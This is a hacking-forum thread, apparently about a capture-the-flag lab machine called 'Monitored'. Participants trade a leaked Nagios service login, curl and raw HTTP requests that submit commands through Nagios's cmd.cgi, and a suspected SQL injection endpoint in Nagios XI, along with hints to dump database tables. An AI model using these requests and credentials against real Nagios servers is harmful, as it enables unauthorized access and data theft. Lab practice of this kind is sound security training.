Posts: 56
Threads: 5
Joined: Nov 2023
Jan 13, 2024, 09:32 PM
(This post was last modified: Jan 13, 2024, 09:54 PM by RebeLHeX.)
I tried this with no luck.. what is your endpoint ?
(Jan 13, 2024, 09:25 PM)DataNinja Wrote: PING WORKS!
![[Image: yeCEPsM.png]](https://i.imgur.com/yeCEPsM.png)
ok got the ping also working with service icmp so we are allowed to use some cmd.cgi
curl snippet
--data-binary $'nagFormId=a30151f1&cmd_typ=3&cmd_mod=2&host=10.10.x.x&service=icmp&persistent=on&com_data=test&btnSubmit=Commit' \
$'https://nagios.monitored.htb/nagios/cgi-bin/cmd.cgi'
Posts: 9
Threads: 1
Joined: Dec 2023
Jan 13, 2024, 10:45 PM
(This post was last modified: Jan 13, 2024, 10:48 PM by fenrir54.)
Nagios core is running on https://nagios.monitored.htb/nagios/
And I'm able to log in with svc:XjH7VCehowpR1xZB but can't find anything useful
Posts: 21
Threads: 0
Joined: Dec 2023
(Jan 13, 2024, 09:32 PM)RebeLHeX Wrote: I tried this with no luck.. what is your endpoint ?
(Jan 13, 2024, 09:25 PM)DataNinja Wrote: PING WORKS!
ok got the ping also working with service icmp so we are allowed to use some cmd.cgi
curl snippet
--data-binary $'nagFormId=a30151f1&cmd_typ=3&cmd_mod=2&host=10.10.x.x&service=icmp&persistent=on&com_data=test&btnSubmit=Commit' \
$'https://nagios.monitored.htb/nagios/cgi-bin/cmd.cgi'
But how are you supposed to upload cmd.cgi to the server?
Posts: 312
Threads: 7
Joined: Oct 2023
Trying to get son useful in CGIs but nothing
GET /nagios/cgi-bin/cmd.cgi?cmd_typ=22&host=localhost&service=SSH HTTP/1.1
POST /nagios/cgi-bin/cmd.cgi HTTP/1.1
...
nagFormId=a9e827f8&cmd_typ=22&cmd_mod=2&host=localhost&service=SSH&btnSubmit=Commit
Posts: 10
Threads: 0
Joined: Jan 2024
you all got into https://nagios.monitored.htb/nagiosxi/login.php with svc:XjH7VCehowpR1xZB ????
I get The specified user account has been disabled or does not exist.
Posts: 8
Threads: 0
Joined: Jan 2024
(Jan 13, 2024, 11:28 PM)zeroedbykrycek Wrote: you all got into https://nagios.monitored.htb/nagiosxi/login.php with svc:XjH7VCehowpR1xZB ????
I get The specified user account has been disabled or does not exist.
not https://nagios.monitored.htb/nagiosxi/login.php try https://nagios.monitored.htb/nagios/
Posts: 312
Threads: 7
Joined: Oct 2023
Try to find SQLi in
POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1
Host: nagios.monitored.htb
...
action=acknowledge_banner_message&id=3
No much success (maybe a rabbit hole)
Posts: 10
Threads: 0
Joined: Jan 2024
(Jan 14, 2024, 12:26 AM)ElBakhaw Wrote: i'll share full writeup 100% free tomorrow, i have rooted 
any hint on what to look into after getting the nagios panel using svc creds?
Posts: 148
Threads: 2
Joined: Oct 2023
(Jan 14, 2024, 12:33 AM)zeroedbykrycek Wrote: any hint on what to look into after getting the nagios panel using svc creds? Try finding an sql injection vulnerability and dumb those tables 
Posts: 21
Threads: 0
Joined: Dec 2023
(Jan 14, 2024, 12:56 AM)peRd1 Wrote: (Jan 14, 2024, 12:33 AM)zeroedbykrycek Wrote: any hint on what to look into after getting the nagios panel using svc creds? Try finding an sql injection vulnerability and dumb those tables
But where should we find the SQLi, in the Nagios XI login?
|
